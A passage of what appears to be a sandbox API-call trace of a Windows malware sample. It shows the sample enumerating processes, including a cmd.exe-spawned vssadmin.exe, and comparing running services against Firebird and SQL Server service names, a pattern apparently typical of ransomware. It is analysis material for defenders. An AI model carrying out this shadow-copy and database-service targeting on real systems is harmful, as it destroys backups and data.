th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.067] lstrlenW (lpString="svchost.exe") returned 11 [0036.067] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.067] lstrlenW (lpString="svchost.exe") returned 11 [0036.067] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.068] lstrlenW (lpString="svchost.exe") returned 11 [0036.068] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.069] lstrlenW (lpString="svchost.exe") returned 11 [0036.069] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0036.070] lstrlenW (lpString="audiodg.exe") returned 11 [0036.070] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.070] lstrlenW (lpString="svchost.exe") returned 11 [0036.070] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.071] lstrlenW (lpString="svchost.exe") returned 11 [0036.071] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0036.072] lstrlenW (lpString="dwm.exe") returned 7 [0036.072] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0036.072] lstrlenW (lpString="explorer.exe") returned 12 [0036.072] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0036.073] lstrlenW (lpString="spoolsv.exe") returned 11 [0036.073] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.074] lstrlenW (lpString="taskhost.exe") returned 12 [0036.074] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.074] lstrlenW (lpString="svchost.exe") returned 11 [0036.074] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0036.075] lstrlenW (lpString="taskeng.exe") returned 11 [0036.075] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.076] lstrlenW (lpString="taskhost.exe") returned 12 [0036.076] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0036.077] lstrlenW (lpString="called.exe") returned 10 [0036.077] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0036.077] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0036.077] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0036.078] lstrlenW (lpString="analyst.exe") returned 11 [0036.078] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0036.079] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0036.079] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0036.079] lstrlenW (lpString="wages.exe") returned 9 [0036.079] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0036.080] lstrlenW (lpString="rand.exe") returned 8 [0036.080] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0036.081] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0036.081] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0036.372] lstrlenW (lpString="cottage.exe") returned 11 [0036.373] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0036.377] lstrlenW (lpString="pairs_spec.exe") returned 14 [0036.377] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0036.378] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0036.378] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0036.379] lstrlenW (lpString="observationshairy.exe") returned 21 [0036.379] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0036.379] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0036.379] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0036.380] lstrlenW (lpString="spectrum.exe") returned 12 [0036.380] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0036.381] lstrlenW (lpString="dies.exe") returned 8 [0036.381] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0036.381] lstrlenW (lpString="configured.exe") returned 14 [0036.381] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0036.382] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0036.382] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0036.383] lstrlenW (lpString="fast.exe") returned 8 [0036.383] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0036.383] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0036.383] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0036.384] lstrlenW (lpString="review.exe") returned 10 [0036.384] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0036.385] lstrlenW (lpString="historybinding.exe") returned 18 [0036.385] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0036.385] lstrlenW (lpString="pk task surge.exe") returned 17 [0036.385] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0036.386] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0036.386] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0036.387] lstrlenW (lpString="mobsync.exe") returned 11 [0036.387] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.388] lstrlenW (lpString="dllhost.exe") returned 11 [0036.388] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.388] lstrlenW (lpString="dllhost.exe") returned 11 [0036.388] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0036.389] lstrlenW (lpString="ivttvf.exe") returned 10 [0036.389] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0036.390] lstrlenW (lpString="cmd.exe") returned 7 [0036.390] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0036.390] lstrlenW (lpString="conhost.exe") returned 11 [0036.390] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0036.391] lstrlenW (lpString="vssadmin.exe") returned 12 [0036.391] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0036.392] CloseHandle (hObject=0x190) returned 1 [0036.392] Sleep (dwMilliseconds=0x1f4) [0037.117] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efd00 [0037.117] EnumServicesStatusExW (in: hSCManager=0x5efd00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0037.118] GetLastError () returned 0xea [0037.118] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x11e4) returned 0x5c9078 [0037.118] EnumServicesStatusExW (in: hSCManager=0x5efd00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x5c9078, cbBufSize=0x11e4, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x5c9078, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0037.119] CloseServiceHandle (hSCObject=0x5efd00) returned 1 [0037.119] lstrlenW (lpString="Appinfo") returned 7 [0037.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0037.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0037.119] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0037.119] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0037.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0037.119] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0037.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0037.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0037.119] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0037.119] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0037.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0037.119] lstrlenW (lpString="AudioSrv") returned 8 [0037.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0037.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0037.119] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0037.119] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0037.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0037.119] lstrlenW (lpString="BFE") returned 3 [0037.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0037.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0037.119] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0037.119] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0037.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0037.120] lstrlenW (lpString="CryptSvc") returned 8 [0037.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0037.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0037.120] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0037.120] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0037.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0037.120] lstrlenW (lpString="CscService") returned 10 [0037.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0037.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0037.120] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0037.120] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0037.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0037.120] lstrlenW (lpString="DcomLaunch") returned 10 [0037.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0037.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0037.120] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0037.120] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0037.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0037.120] lstrlenW (lpString="Dhcp") returned 4 [0037.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0037.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0037.120] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0037.120] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0037.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0037.120] lstrlenW (lpString="Dnscache") returned 8 [0037.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0037.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0037.120] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0037.121] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0037.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0037.121] lstrlenW (lpString="DPS") returned 3 [0037.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0037.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0037.121] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0037.121] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0037.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0037.121] lstrlenW (lpString="eventlog") returned 8 [0037.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0037.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0037.121] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0037.121] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0037.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0037.121] lstrlenW (lpString="EventSystem") returned 11 [0037.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0037.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0037.121] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0037.121] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0037.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0037.121] lstrlenW (lpString="gpsvc") returned 5 [0037.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0037.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0037.121] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0037.121] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0037.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0037.121] lstrlenW (lpString="iphlpsvc") returned 8 [0037.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0037.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0037.121] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0037.121] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0037.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0037.121] lstrlenW (lpString="LanmanServer") returned 12 [0037.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0037.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0037.122] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0037.122] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0037.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0037.122] lstrlenW (lpString="LanmanWorkstation") returned 17 [0037.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0037.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0037.122] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0037.122] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0037.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0037.122] lstrlenW (lpString="lmhosts") returned 7 [0037.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0037.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0037.122] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0037.122] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0037.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0037.122] lstrlenW (lpString="MMCSS") returned 5 [0037.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0037.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0037.122] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0037.122] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0037.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0037.122] lstrlenW (lpString="MpsSvc") returned 6 [0037.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0037.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0037.122] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0037.122] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0037.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0037.122] lstrlenW (lpString="Netman") returned 6 [0037.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0037.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0037.122] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0037.122] 